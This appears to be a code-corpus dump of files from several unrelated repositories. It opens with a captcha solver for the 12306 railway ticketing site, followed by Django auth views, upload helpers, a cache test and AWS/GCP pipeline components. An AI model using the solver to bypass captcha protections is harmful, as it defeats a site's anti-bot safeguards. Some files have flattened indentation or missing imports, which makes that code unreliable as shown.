import cv2
import numpy as np
import scipy.fftpack
graph = tf.get_default_graph()
PATH = lambda p: os.path.abspath(
os.path.join(os.path.dirname(__file__), p)
)
TEXT_MODEL = ""
IMG_MODEL = ""
def pretreatment_get_text(img, offset=0):
    # get the text region of the image
return img[3:22, 120 + offset:177 + offset]
def phash(im):
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC)
im = scipy.fftpack.dct(scipy.fftpack.dct(im, axis=0), axis=1)
im = im[:8, :8]
med = np.median(im)
im = im > med
im = np.packbits(im)
return im
def _get_imgs(img):
interval = 5
length = 67
for x in range(40, img.shape[0] - length, interval + length):
for y in range(interval, img.shape[1] - length, interval + length):
yield img[x:x + length, y:y + length]
def get_imgs(img):
imgs = []
for img in _get_imgs(img):
imgs.append(phash(img))
return imgs
def get_text(img, offset=0):
text = pretreatment_get_text(img, offset)
text = cv2.cvtColor(text, cv2.COLOR_BGR2GRAY)
text = text / 255.0
h, w = text.shape
text.shape = (1, h, w, 1)
return text
def base64_to_image(base64_code):
    # decode the base64 string
img_data = base64.b64decode(base64_code)
    # convert to a numpy array
img_array = np.fromstring(img_data, np.uint8)
    # decode into an OpenCV-usable image
img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR)
return img
def preprocess_input(x):
x = x.astype('float32')
    # the image is read with cv2, so it is already in BGR format
mean = [103.939, 116.779, 123.68]
x -= mean
return x
def code_xy(Ofset=None, is_raw_input=True):
"""
    Get the verification code selection coordinates
:return: str
"""
if is_raw_input:
print(u"""
*****************
| 1 | 2 | 3 | 4 |
*****************
| 5 | 6 | 7 | 8 |
*****************
""")
print(u"验证码分为8个,对应上面数字,例如第一和第二张,输入1, 2 如果开启cdn查询的话,会冲掉提示,直接鼠标点击命令行获取焦点,输入即可,不要输入空格")
print(u"如果是linux无图形界面,请使用自动打码,is_auto_code: True")
print(u"如果没有弹出验证码,请手动双击根目录下的tkcode.png文件")
Ofset = input(u"输入对应的验证码: ")
if isinstance(Ofset, list):
select = Ofset
else:
Ofset = Ofset.replace(",", ",")
select = Ofset.split(',')
post = []
    offsetsX = 0 # left value of the selected answer, obtained in a browser by clicking the centre of each of the 8 sub-images, which works reliably
    offsetsY = 0 # top value of the selected answer
for ofset in select:
if ofset == '1':
offsetsY = 77
offsetsX = 40
elif ofset == '2':
offsetsY = 77
offsetsX = 112
elif ofset == '3':
offsetsY = 77
offsetsX = 184
elif ofset == '4':
offsetsY = 77
offsetsX = 256
elif ofset == '5':
offsetsY = 149
offsetsX = 40
elif ofset == '6':
offsetsY = 149
offsetsX = 112
elif ofset == '7':
offsetsY = 149
offsetsX = 184
elif ofset == '8':
offsetsY = 149
offsetsX = 256
else:
pass
post.append(offsetsX)
post.append(offsetsY)
randCode = str(post).replace(']', '').replace('[', '').replace("'", '').replace(' ', '')
print(u"验证码识别坐标为{0}".format(randCode))
return randCode
class Verify:
def __init__(self):
self.textModel = ""
self.imgModel = ""
self.loadImgModel()
self.loadTextModel()
def loadTextModel(self):
if not self.textModel:
self.textModel = models.load_model(PATH('model.v2.0.h5'))
else:
print("无需加载模型model.v2.0.h5")
def loadImgModel(self):
if not self.imgModel:
self.imgModel = models.load_model(PATH('12306.image.model.h5'))
def verify(self, fn):
verify_titles = ['打字机', '调色板', '跑步机', '毛线', '老虎', '安全帽', '沙包', '盘子', '本子', '药片', '双面胶', '龙舟', '红酒', '拖把', '卷尺',
'海苔', '红豆', '黑板', '热水袋', '烛台', '钟表', '路灯', '沙拉', '海报', '公交卡', '樱桃', '创可贴', '牌坊', '苍蝇拍', '高压锅',
'电线', '网球拍', '海鸥', '风铃', '订书机', '冰箱', '话梅', '排风机', '锅铲', '绿豆', '航母', '电子秤', '红枣', '金字塔', '鞭炮',
'菠萝', '开瓶器', '电饭煲', '仪表盘', '棉棒', '篮球', '狮子', '蚂蚁', '蜡烛', '茶盅', '印章', '茶几', '啤酒', '档案袋', '挂钟',
'刺绣',
'铃铛', '护腕', '手掌印', '锦旗', '文具盒', '辣椒酱', '耳塞', '中国结', '蜥蜴', '剪纸', '漏斗', '锣', '蒸笼', '珊瑚', '雨靴',
'薯条',
'蜜蜂', '日历', '口哨']
        # read and preprocess the captcha image
img = base64_to_image(fn)
text = get_text(img)
imgs = np.array(list(_get_imgs(img)))
imgs = preprocess_input(imgs)
text_list = []
        # recognize the text
self.loadTextModel()
global graph
with graph.as_default():
label = self.textModel.predict(text)
label = label.argmax()
text = verify_titles[label]
text_list.append(text)
        # get the next word
        # locate the second word based on the length of the first word
if len(text) == 1:
offset = 27
elif len(text) == 2:
offset = 47
else:
offset = 60
text = get_text(img, offset=offset)
if text.mean() < 0.95:
with graph.as_default():
label = self.textModel.predict(text)
label = label.argmax()
text = verify_titles[label]
text_list.append(text)
print("题目为{}".format(text_list))
        # load the image classifier
self.loadImgModel()
with graph.as_default():
labels = self.imgModel.predict(imgs)
labels = labels.argmax(axis=1)
results = []
for pos, label in enumerate(labels):
l = verify_titles[label]
print(pos + 1, l)
if l in text_list:
results.append(str(pos + 1))
return results
``` |
{
"source": "15281029/privacyinfo",
"score": 2
} |
#### File: privacyinfo/pinfo/views.py
```python
from django.shortcuts import render
from django.contrib.auth.hashers import make_password, check_password
from django.http import HttpResponse
from django.http import request
from pinfo import models
def register(request):
if request.method == 'POST':
username = request.POST.get('username')
email = request.POST.get('email')
phone = request.POST.get('phone')
password = request.POST.get('password')
user = models.UserModel.objects.filter(username=username)
eml = models.UserModel.objects.filter(email=email)
if user:
return render(request, 'registererr.html', {'errinfo': '用户名已经存在'})
elif eml:
return render(request, 'registererr.html', {'errinfo': '邮箱已被注册'})
else:
newuser = models.UserModel.objects.create(
username=username, phone=phone, password=make_password(password), email=email)
newuser.save()
return render(request, "register.html")
def login(request):
if request.method == 'POST':
logininfo = request.POST.get('logininfo')
password = request.POST.get('password')
try:
linfo = models.UserModel.objects.get(username=logininfo)
pwd = linfo.password
if check_password(password, pwd):
return HttpResponse('OK')
except Exception:
try:
linfo = models.UserModel.objects.get(email=logininfo)
pwd = linfo.password
if check_password(password, pwd):
return HttpResponse('OK')
except Exception:
return render(request, "loginerr.html")
return render(request, "login.html")
``` |
{
"source": "15281029/PyCache",
"score": 3
} |
#### File: PyCache/tests/test.py
```python
import time
from iCache.iCache import Cache
cache = Cache(maxsize=255, ttl=5)  # set the global ttl (cache lifetime) to 5s
# manually create a single-value cache entry with a per-entry ttl that overrides the global setting for this value only
cache.set(1, 'foo', ttl=3)
cache.set(2, 'bar')
# get all information for the value, including value, ttl (lifetime) and time (when it was saved)
print(cache.get_all(1))
# get only the value
print(cache.get_value(1))
# a decorator is supported that automatically caches the function's return value, here with a 1s ttl
@cache.cache(ttl=1)
def func(a, b):
    return a+b
func(1, 3)
# view all cached entries
cache.view_cache()
# get the cached return value of the function
print(cache.get_value(func))
# check whether the current cache entry is still valid
print(cache.is_effective(func))
time.sleep(2)  # wait 2s
# confirm whether the cached result is still valid
print(cache.is_effective(func))
# use subscript access for quick lookup of cached elements
print(cache[func])
# compute the current cache size
print(len(cache))
cache.delete(para='invalid')
cache.view_cache()
# dump the cache to json
# print(cache.dump())
``` |
{
"source": "1535315854/Awesome-semantic-segmentation-pytorch",
"score": 3
} |
#### File: 1535315854/Awesome-semantic-segmentation-pytorch/demo.py
```python
import os
import argparse
import torch
from torchvision import transforms
from PIL import Image
from utils.visualize import get_color_pallete
from models import get_model
parser = argparse.ArgumentParser(
description='Predict segmentation result from a given image')
parser.add_argument('--model', type=str, default='fcn32s_vgg16_voc',
help='model name (default: fcn32_vgg16)')
parser.add_argument('--dataset', type=str, default='pascal_aug', choices=['pascal_voc', 'pascal_aug', 'ade20k', 'citys'],
help='dataset name (default: pascal_voc)')
parser.add_argument('--save-folder', default='~/.torch/models',
help='Directory for saving checkpoint models')
parser.add_argument('--input-pic', type=str, default='./datasets/VOCdevkit/VOC2012/JPEGImages/2007_000032.jpg',
help='path to the input picture')
parser.add_argument('--outdir', default='./eval', type=str,
help='path to save the predict result')
args = parser.parse_args()
def demo(config):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# output folder
if not os.path.exists(config.outdir):
os.makedirs(config.outdir)
# image transform
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
image = Image.open(config.input_pic).convert('RGB')
images = transform(image).unsqueeze(0).to(device)
model = get_model(args.model, pretrained=True, root=args.save_folder).to(device)
print('Finished loading model!')
model.eval()
with torch.no_grad():
output = model(images)
pred = torch.argmax(output[0], 1).squeeze(0).cpu().data.numpy()
mask = get_color_pallete(pred, args.dataset)
outname = os.path.splitext(os.path.split(args.input_pic)[-1])[0] + '.png'
mask.save(os.path.join(args.outdir, outname))
if __name__ == '__main__':
demo(args)
``` |
{
"source": "15354333388/haxizhijiao",
"score": 3
} |
#### File: haxizhijiao/hzxi/haxi_file.py
```python
import os
from . import haxi_timechange
from haxizhijiao import settings
class File_Operation(object):
@staticmethod
    def save_file(file, static_url=settings.MEDIA_ROOT): # save the file locally
save_time = haxi_timechange.ChangeTime.change_time_to_date("%Y%m%d%H%M%S")
fname = os.path.join(static_url, save_time + file.name)
while True:
if os.path.exists(fname):
save_time = haxi_timechange.ChangeTime.change_time_to_date("%Y%m%d%H%M%S")
fname = os.path.join(static_url, save_time + file.name)
else:
break
image_url = save_time + file.name
try:
with open(fname, 'wb') as pic:
for c in file.chunks():
pic.write(c)
except:
if os.path.exists(fname):
os.remove(fname)
            return None # return None when creating the new file fails
return image_url
```
#### File: haxizhijiao/hzxi/haxi_maneouvre_middle.py
```python
import os
from django.db import transaction
from . import models
from . import database_operation
from . import database
from . import haxi_qiniuyun
from . import haxi_file
from haxizhijiao import settings
from .haxi_error import SaveLocalError, SaveQiniuyunError
from . import haxi_timechange
class ManeouvreMiddle(object):
@staticmethod
def get_maneouvre_middle(limit=1, skip=0, desc='-ym_id', fields=[], contions={}):
fields = fields if fields else database.manoeuvre_middle_fields
queryset = database_operation.DatabaseOperation(models.ManoeuverMiddle).find(fields=fields, contions=contions, limit=limit, skip=skip, desc=desc)
if not queryset:
return None
data = []
for query in queryset:
query['ym_user'] = models.User.objects.filter(u_id=query['ym_user'])
query['ym_maneouvre'] = models.Manoeuvre.objects.filter(y_id=query['ym_maneouvre'])
data.append(query)
return data
@staticmethod
def create_middle_manoeuvre(body, data, text=None):
        # verify the ids
if not (models.ManoeuverMiddle.objects.filter(ym_user__u_id=body['u_id'], ym_manoeuvre__y_id=body['y_id'])):
return 'bad request'
# 取出文件
success_url = list()
response_url = list()
try:
with transaction.atomic():
for name in ['image', 'video', 'files']:
files_url = list()
files_data = list()
for i in range(1, 11):
if not data.get(name+str(i)):
break
files_data.append(data.get(name+str(i)))
                    # pass to the Qiniu upload function for storage
if files_data:
for file_data in files_data:
                            for _ in range(3): # try saving up to 3 times; after three failures, declare failure and return
relative_url = haxi_file.File_Operation.save_file(file_data)
if relative_url:
break
if _ == 2:
raise SaveLocalError('%s保存到本地失败' % file_data.name)
                            absolute_url = os.path.join(settings.MEDIA_ROOT, relative_url) # build the absolute path from the relative file path
                            haxi_qiniuyun.Qiniuyun.save_qiniuyun(relative_url, absolute_url) # upload: key is the relative path, source is the absolute file path
files_url.append('http://pksdg2zat.bkt.clouddn.com' + '/' + absolute_url)
success_url.append(absolute_url)
response_url.append('http://pksdg2zat.bkt.clouddn.com' + '/' + relative_url)
for t in range(3):
retDate, infoDate = haxi_qiniuyun.Qiniuyun.save_qiniuyun(relative_url, absolute_url)
# if retDate:
# break
# if t == 2:
# os.remove(absolute_url)
# raise SaveQiniuyunError('%s保存到七牛云失败' % file_data.name)
                            os.remove(absolute_url) # delete the local file
                    # save the urls to the database
models.ManoeuverMiddle.objects.filter(ym_manoeuvre__y_id=body['y_id'], ym_user__u_id=body['u_id']).update(**{'ym_{name}_url'.format(name=name): ' '.join(files_url)})
query = models.ManoeuverMiddle.objects.filter(ym_manoeuvre__y_id=body['y_id'], ym_user__u_id=body['u_id'])
query.update(ym_finishedtime=haxi_timechange.ChangeTime.change_time_to_date("%Y-%m-%d %H:%M:%S"), ym_finished=True)
models.Incident.objects.filter(i_symbol=body['y_id'], i_table='manoeuvre').\
update(i_symbol=body['y_id'], i_table='manoeuvre', i_endtime=haxi_timechange.ChangeTime.change_time_to_date("%Y-%m-%d %H:%M:%S"))
if text:
query.update(ym_answer=text)
except SaveLocalError as e:
for successed in success_url:
haxi_qiniuyun.Qiniuyun.delete_qiniuyun(successed)
return e
except SaveQiniuyunError as e:
for successed in success_url:
haxi_qiniuyun.Qiniuyun.delete_qiniuyun(successed)
return e
return response_url
# return fail_files
# ym_score = models.IntegerField(null=True)
# ym_timeremaining = models.IntegerField()
# ym_result = models.CharField(max_length=256, null=True)
# ym_createtime = models.DateTimeField(auto_now_add=True)
# ym_changetime = models.DateTimeField(auto_now=True)
# ym_finished = models.BooleanField(default=False)
# ym_finishedtime = models.DateTimeField(null=True
```
#### File: haxizhijiao/hzxi/permissions.py
```python
import json
from rest_framework import status
from django.shortcuts import render, redirect
from django.http import HttpResponse,JsonResponse
from . import models
from . import database
def is_login(func):
def wapper(request, *args, **kwargs):
if request.COOKIES.get('is_login', False):
u_pid = request.session.get('pid', '')
query = models.User.objects.filter(u_pid=u_pid)
if query and len(query) == 1:
return func(request, *args, **kwargs)
else:
return redirect('/hzxi/index/')
else:
return redirect('/hzxi/index/')
return wapper
def verify_permissions(func):
def wapper(request, *args, **kwargs):
func(request, *args, **kwargs)
return wapper
def is_ajax(func):
def wapper(request, *args, **kwargs):
if not request.is_ajax():
data = database.data
data['status'] = 'error'
data['msg'] = 'only receive ajax request'
return JsonResponse(data, status=status.HTTP_400_BAD_REQUEST)
return func(request, *args, **kwargs)
return wapper
def is_same(func):
def wapper(request, *args, **kwargs):
data = database.data
data['status'] = 'error'
data['msg'] = 'session is not same request, please login again'
if request.method == 'GET':
            if not ((json.loads(request.GET.get('u_pid')) if request.GET.get('u_pid') else None) == request.session['pid']):
return JsonResponse(data, status=status.HTTP_400_BAD_REQUEST)
elif not request.body.get('u_pid') == request.session['pid']:
return JsonResponse(data, status=status.HTTP_400_BAD_REQUEST)
print('ok------------------', request.path, request.method)
return func(request, *args, **kwargs)
return wapper
```
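A hypothetical view showing how the decorators above compose (the view itself is not part of the repository):

```python
# Hypothetical Django view; is_login redirects anonymous users, is_ajax rejects non-AJAX requests.
from django.http import JsonResponse
from .permissions import is_login, is_ajax

@is_login
@is_ajax
def profile(request):
    return JsonResponse({'status': 'ok'})
```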
#### File: haxizhijiao/hzxi/qiniyuntest.py
```python
import os
import time
from django.http import JsonResponse
from django.shortcuts import render
from qiniu import Auth, put_file, etag
from . import models
from haxizhijiao import settings
def save_image(file, static_url=settings.MEDIA_ROOT):
def get_save_time(): # create time to save file
timeStamp = time.time()
timeArray = time.localtime(timeStamp)
otherStyleTime = time.strftime("%Y%m%d%H%M%S", timeArray)
return otherStyleTime
save_time = get_save_time()
fname = os.path.join(static_url, save_time+file.name)
while True:
if os.path.exists(fname):
save_time = get_save_time()
fname = os.path.join(static_url, save_time+file.name)
else:
break
image_url = save_time+file.name
try:
with open(fname, 'wb') as pic:
for c in file.chunks():
pic.write(c)
except:
os.remove(fname) if os.path.exists(fname) else None
        return None # return None when creating the new file fails
# image size operation
# im = Image.open(fname)
# out = im.resize((128, 128), Image.ANTIALIAS)
# out.save(fname, 'jpeg')
return image_url
def ceshi(request):
return render(request, 'chuanm.html')
def parseRet(retData, respInfo):
if retData != None:
print("Upload file success!")
print("Hash: " + retData["hash"])
print("Key: " + retData["key"])
        # check the extended parameters
for k, v in retData.items():
if k[:2] == "x:":
print(k + ":" + v)
        # check the other parameters
for k, v in retData.items():
if k[:2] == "x:" or k == "hash" or k == "key":
continue
else:
print(k + ":" + str(v))
else:
print("Upload file failed!")
print("Error: " + respInfo.text_body)
def upload(request):
if request.method == 'POST':
# name = request.POST.get('username')
data = []
resp = []
for i in range(1,11):
name = 'img{0}'.format(i)
avatar = request.FILES.get(name)
if not avatar:
return JsonResponse({'msg': resp})
            root = save_image(avatar) # relative path of the saved file
if root:
localfile = os.path.join(settings.MEDIA_ROOT, root)
data.append(root)
uuid = root
models.Userp.objects.create(avatar=root)
access_key = "<KEY>"
secret_key = "<KEY>"
bucket_name = 'zhijiao'
q = Auth(access_key, secret_key)
print(root)
key = root
print(key)
policy = {
'callbackUrl': 'pksdg2zat.bkt.clouddn.com',
'callbackBody': 'filename=$(fname)&filesize=$(fsize)'
}
token = q.upload_token(bucket_name, key, 3600, policy)
# localfile = './static/uploads/avatar/%s' % avatar
retDate, infoDate = put_file(token, key, localfile)
print(root)
print(localfile)
parseRet(retDate, infoDate)
# os.remove(localfile)
resp.append({
'url': 'http://pksdg2zat.bkt.clouddn.com' + '/' + root
})
return JsonResponse(data={'msg': 'OK'})
# return render(request, 'upload.html')
# STATIC_URL = '/static/'
#
# MEDIA_ROOT = os.path.join(BASE_DIR, 'static/uploads')
#
# STATICFILES_DIRS = [
# os.path.join(BASE_DIR, 'static'),
# ]
``` |
{
"source": "15379180/pipelines",
"score": 2
} |
#### File: query/src/query.py
```python
import argparse
import json
import logging
import time
import re
import boto3
def get_client(region=None):
"""Builds a client to the AWS Athena API."""
client = boto3.client('athena', region_name=region)
return client
def query(client, query, database, output):
response = client.start_query_execution(
QueryString=query,
QueryExecutionContext={
'Database': database
},
ResultConfiguration={
'OutputLocation': output,
}
)
execution_id = response['QueryExecutionId']
logging.info('Execution ID: %s', execution_id)
    # Athena queries are asynchronous; we need to poll for results and wait for the execution to finish
state = 'RUNNING'
max_execution = 5 # TODO: this should be an optional parameter from users. or use timeout
while (max_execution > 0 and state in ['RUNNING']):
max_execution = max_execution - 1
response = client.get_query_execution(QueryExecutionId = execution_id)
if 'QueryExecution' in response and \
'Status' in response['QueryExecution'] and \
'State' in response['QueryExecution']['Status']:
state = response['QueryExecution']['Status']['State']
if state == 'FAILED':
raise Exception('Athena Query Failed')
elif state == 'SUCCEEDED':
s3_path = response['QueryExecution']['ResultConfiguration']['OutputLocation']
# could be multiple files?
filename = re.findall('.*\/(.*)', s3_path)[0]
logging.info("S3 output file name %s", filename)
break
time.sleep(5)
# TODO:(@Jeffwan) Add more details.
result = {
'total_bytes_processed': response['QueryExecution']['Statistics']['DataScannedInBytes'],
'filename': filename
}
return result
def main():
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument('--region', type=str, help='Athena region.')
parser.add_argument('--database', type=str, required=True, help='The name of the database.')
parser.add_argument('--query', type=str, required=True, help='The SQL query statements to be executed in Athena.')
parser.add_argument('--output', type=str, required=False,
help='The location in Amazon S3 where your query results are stored, such as s3://path/to/query/bucket/')
args = parser.parse_args()
client = get_client(args.region)
results = query(client, args.query, args.database, args.output)
results['output'] = args.output
logging.info('Athena results: %s', results)
with open('/output.txt', 'w+') as f:
json.dump(results, f)
if __name__ == '__main__':
main()
```
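A minimal usage sketch for the Athena component above; the region, database, and output bucket are placeholders, and the import assumes `query.py` is importable as a module:
```python
# Hypothetical values for illustration only; real use needs AWS credentials.
from query import get_client, query  # assumed import path for the file above

client = get_client(region='us-west-2')
result = query(
    client,
    'SELECT * FROM my_table LIMIT 10',
    database='my_database',
    output='s3://my-results-bucket/athena/',
)
print(result['filename'], result['total_bytes_processed'])
```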
#### File: aws/sagemaker/run_tests.py
```python
import os
import sys
import unittest
# Taken from http://stackoverflow.com/a/17004263/2931197
def load_and_run_tests():
setup_file = sys.modules['__main__'].__file__
setup_dir = os.path.abspath(os.path.dirname(setup_file))
test_loader = unittest.defaultTestLoader
test_runner = unittest.TextTestRunner()
test_suite = test_loader.discover(setup_dir, pattern="test_*.py")
test_runner.run(test_suite)
if __name__ == '__main__':
load_and_run_tests()
```
#### File: train/src/train.py
```python
import argparse
import logging
from common import _utils
def create_parser():
parser = argparse.ArgumentParser(description='SageMaker Training Job')
_utils.add_default_client_arguments(parser)
parser.add_argument('--job_name', type=str.strip, required=False, help='The name of the training job.', default='')
parser.add_argument('--role', type=str.strip, required=True, help='The Amazon Resource Name (ARN) that Amazon SageMaker assumes to perform tasks on your behalf.')
parser.add_argument('--image', type=str.strip, required=True, help='The registry path of the Docker image that contains the training algorithm.', default='')
parser.add_argument('--algorithm_name', type=str.strip, required=False, help='The name of the resource algorithm to use for the training job.', default='')
parser.add_argument('--metric_definitions', type=_utils.str_to_json_dict, required=False, help='The dictionary of name-regex pairs specify the metrics that the algorithm emits.', default='{}')
parser.add_argument('--training_input_mode', choices=['File', 'Pipe'], type=str.strip, help='The input mode that the algorithm supports. File or Pipe.', default='File')
    parser.add_argument('--hyperparameters', type=_utils.str_to_json_dict, help='Dictionary of hyperparameters for the algorithm.', default='{}')
parser.add_argument('--channels', type=_utils.str_to_json_list, required=True, help='A list of dicts specifying the input channels. Must have at least one.')
parser.add_argument('--data_location_1', type=str.strip, required=False, help='The S3 URI of the input data source for channel 1.', default='')
parser.add_argument('--data_location_2', type=str.strip, required=False, help='The S3 URI of the input data source for channel 2.', default='')
parser.add_argument('--data_location_3', type=str.strip, required=False, help='The S3 URI of the input data source for channel 3.', default='')
parser.add_argument('--data_location_4', type=str.strip, required=False, help='The S3 URI of the input data source for channel 4.', default='')
parser.add_argument('--data_location_5', type=str.strip, required=False, help='The S3 URI of the input data source for channel 5.', default='')
parser.add_argument('--data_location_6', type=str.strip, required=False, help='The S3 URI of the input data source for channel 6.', default='')
parser.add_argument('--data_location_7', type=str.strip, required=False, help='The S3 URI of the input data source for channel 7.', default='')
parser.add_argument('--data_location_8', type=str.strip, required=False, help='The S3 URI of the input data source for channel 8.', default='')
parser.add_argument('--instance_type', required=True, choices=['ml.m4.xlarge', 'ml.m4.2xlarge', 'ml.m4.4xlarge', 'ml.m4.10xlarge', 'ml.m4.16xlarge', 'ml.m5.large', 'ml.m5.xlarge', 'ml.m5.2xlarge', 'ml.m5.4xlarge',
'ml.m5.12xlarge', 'ml.m5.24xlarge', 'ml.c4.xlarge', 'ml.c4.2xlarge', 'ml.c4.4xlarge', 'ml.c4.8xlarge', 'ml.p2.xlarge', 'ml.p2.8xlarge', 'ml.p2.16xlarge', 'ml.p3.2xlarge', 'ml.p3.8xlarge', 'ml.p3.16xlarge',
'ml.c5.xlarge', 'ml.c5.2xlarge', 'ml.c5.4xlarge', 'ml.c5.9xlarge', 'ml.c5.18xlarge'], type=str.strip, help='The ML compute instance type.', default='ml.m4.xlarge')
    parser.add_argument('--instance_count', required=True, type=_utils.str_to_int, help='The number of ML compute instances to use for the training job.', default=1)
parser.add_argument('--volume_size', type=_utils.str_to_int, required=True, help='The size of the ML storage volume that you want to provision.', default=1)
parser.add_argument('--resource_encryption_key', type=str.strip, required=False, help='The AWS KMS key that Amazon SageMaker uses to encrypt data on the storage volume attached to the ML compute instance(s).', default='')
parser.add_argument('--max_run_time', type=_utils.str_to_int, required=True, help='The maximum run time in seconds for the training job.', default=86400)
parser.add_argument('--model_artifact_path', type=str.strip, required=True, help='Identifies the S3 path where you want Amazon SageMaker to store the model artifacts.')
parser.add_argument('--output_encryption_key', type=str.strip, required=False, help='The AWS KMS key that Amazon SageMaker uses to encrypt the model artifacts.', default='')
parser.add_argument('--vpc_security_group_ids', type=str.strip, required=False, help='The VPC security group IDs, in the form sg-xxxxxxxx.')
parser.add_argument('--vpc_subnets', type=str.strip, required=False, help='The ID of the subnets in the VPC to which you want to connect your hpo job.')
parser.add_argument('--network_isolation', type=_utils.str_to_bool, required=False, help='Isolates the training container.', default=True)
parser.add_argument('--traffic_encryption', type=_utils.str_to_bool, required=False, help='Encrypts all communications between ML compute instances in distributed training.', default=False)
### Start spot instance support
parser.add_argument('--spot_instance', type=_utils.str_to_bool, required=False, help='Use managed spot training.', default=False)
parser.add_argument('--max_wait_time', type=_utils.str_to_int, required=False, help='The maximum time in seconds you are willing to wait for a managed spot training job to complete.', default=86400)
parser.add_argument('--checkpoint_config', type=_utils.str_to_json_dict, required=False, help='Dictionary of information about the output location for managed spot training checkpoint data.', default='{}')
### End spot instance support
parser.add_argument('--tags', type=_utils.str_to_json_dict, required=False, help='An array of key-value pairs, to categorize AWS resources.', default='{}')
return parser
def main(argv=None):
parser = create_parser()
args = parser.parse_args()
logging.getLogger().setLevel(logging.INFO)
client = _utils.get_sagemaker_client(args.region, args.endpoint_url)
logging.info('Submitting Training Job to SageMaker...')
job_name = _utils.create_training_job(client, vars(args))
logging.info('Job request submitted. Waiting for completion...')
_utils.wait_for_training_job(client, job_name)
image = _utils.get_image_from_job(client, job_name)
model_artifact_url = _utils.get_model_artifacts_from_job(client, job_name)
logging.info('Get model artifacts %s from training job %s.', model_artifact_url, job_name)
with open('/tmp/model_artifact_url.txt', 'w') as f:
f.write(model_artifact_url)
with open('/tmp/job_name.txt', 'w') as f:
f.write(job_name)
with open('/tmp/training_image.txt', 'w') as f:
f.write(image)
logging.info('Job completed.')
if __name__== "__main__":
main()
```
#### File: delete_cluster/src/delete_cluster.py
```python
import argparse
from common import _utils
def main(argv=None):
parser = argparse.ArgumentParser(description='ML DataProc Deletion')
parser.add_argument('--project', type=str, help='Google Cloud project ID to use.')
    parser.add_argument('--region', type=str, help='The Cloud Dataproc region in which to handle the request.')
    parser.add_argument('--name', type=str, help='The name of the cluster to delete.')
args = parser.parse_args()
api = _utils.get_client()
print('Tearing down cluster...')
delete_response = _utils.delete_cluster(api, args.project, args.region, args.name)
print('Cluster deletion request submitted. Waiting for completion...')
_utils.wait_for_operation(api, delete_response['name'])
print('Cluster deleted.')
if __name__== "__main__":
main()
```
#### File: google/dataflow/_common_ops.py
```python
import logging
import time
import json
import os
import tempfile
from kfp_component.core import display
from .. import common as gcp_common
from ..storage import download_blob, parse_blob_path, is_gcs_path
_JOB_SUCCESSFUL_STATES = ['JOB_STATE_DONE', 'JOB_STATE_UPDATED', 'JOB_STATE_DRAINED']
_JOB_FAILED_STATES = ['JOB_STATE_STOPPED', 'JOB_STATE_FAILED', 'JOB_STATE_CANCELLED']
_JOB_TERMINATED_STATES = _JOB_SUCCESSFUL_STATES + _JOB_FAILED_STATES
def wait_for_job_done(df_client, project_id, job_id, location=None, wait_interval=30):
while True:
job = df_client.get_job(project_id, job_id, location=location)
state = job.get('currentState', None)
if is_job_done(state):
return job
elif is_job_terminated(state):
# Terminated with error state
raise RuntimeError('Job {} failed with error state: {}.'.format(
job_id,
state
))
else:
logging.info('Job {} is in pending state {}.'
' Waiting for {} seconds for next poll.'.format(
job_id,
state,
wait_interval
))
time.sleep(wait_interval)
def wait_and_dump_job(df_client, project_id, location, job,
wait_interval):
display_job_link(project_id, job)
job_id = job.get('id')
job = wait_for_job_done(df_client, project_id, job_id,
location, wait_interval)
dump_job(job)
return job
def is_job_terminated(job_state):
return job_state in _JOB_TERMINATED_STATES
def is_job_done(job_state):
return job_state in _JOB_SUCCESSFUL_STATES
def display_job_link(project_id, job):
location = job.get('location')
job_id = job.get('id')
display.display(display.Link(
href = 'https://console.cloud.google.com/dataflow/'
'jobsDetail/locations/{}/jobs/{}?project={}'.format(
location, job_id, project_id),
text = 'Job Details'
))
def dump_job(job):
gcp_common.dump_file('/tmp/kfp/output/dataflow/job.json', json.dumps(job))
gcp_common.dump_file('/tmp/kfp/output/dataflow/job_id.txt', job.get('id'))
def stage_file(local_or_gcs_path):
if not is_gcs_path(local_or_gcs_path):
return local_or_gcs_path
_, blob_path = parse_blob_path(local_or_gcs_path)
file_name = os.path.basename(blob_path)
local_file_path = os.path.join(tempfile.mkdtemp(), file_name)
download_blob(local_or_gcs_path, local_file_path)
return local_file_path
def get_staging_location(staging_dir, context_id):
if not staging_dir:
return None
staging_location = os.path.join(staging_dir, context_id)
logging.info('staging_location: {}'.format(staging_location))
return staging_location
def read_job_id_and_location(storage_client, staging_location):
if staging_location:
job_blob = _get_job_blob(storage_client, staging_location)
if job_blob.exists():
job_data = job_blob.download_as_string().decode().split(',')
# Returns (job_id, location)
logging.info('Found existing job {}.'.format(job_data))
return (job_data[0], job_data[1])
return (None, None)
def upload_job_id_and_location(storage_client, staging_location, job_id, location):
if not staging_location:
return
if not location:
location = ''
data = '{},{}'.format(job_id, location)
job_blob = _get_job_blob(storage_client, staging_location)
logging.info('Uploading {} to {}.'.format(data, job_blob))
job_blob.upload_from_string(data)
def _get_job_blob(storage_client, staging_location):
bucket_name, staging_blob_name = parse_blob_path(staging_location)
job_blob_name = os.path.join(staging_blob_name, 'kfp/dataflow/launch_python/job.txt')
bucket = storage_client.bucket(bucket_name)
return bucket.blob(job_blob_name)
```
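A tiny sketch exercising the state helpers above; the state strings come from the module's own constants, and the import path is assumed from the file layout:
```python
from kfp_component.google.dataflow._common_ops import is_job_done, is_job_terminated  # assumed path

assert is_job_done('JOB_STATE_DONE')
assert is_job_terminated('JOB_STATE_FAILED')
assert not is_job_terminated('JOB_STATE_RUNNING')
```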
#### File: google/dataproc/_submit_pyspark_job.py
```python
from ._submit_job import submit_job
def submit_pyspark_job(project_id, region, cluster_name,
main_python_file_uri=None, args=[], pyspark_job={}, job={},
wait_interval=30):
"""Submits a Cloud Dataproc job for running Apache PySpark applications on YARN.
Args:
project_id (str): Required. The ID of the Google Cloud Platform project
that the cluster belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the
request.
cluster_name (str): Required. The cluster to run the job.
main_python_file_uri (str): Required. The HCFS URI of the main Python file to
use as the driver. Must be a .py file.
args (list): Optional. The arguments to pass to the driver. Do not include
arguments, such as --conf, that can be set as job properties, since a
collision may occur that causes an incorrect job submission.
pyspark_job (dict): Optional. The full payload of a [PySparkJob](
https://cloud.google.com/dataproc/docs/reference/rest/v1/PySparkJob).
job (dict): Optional. The full payload of a [Dataproc job](
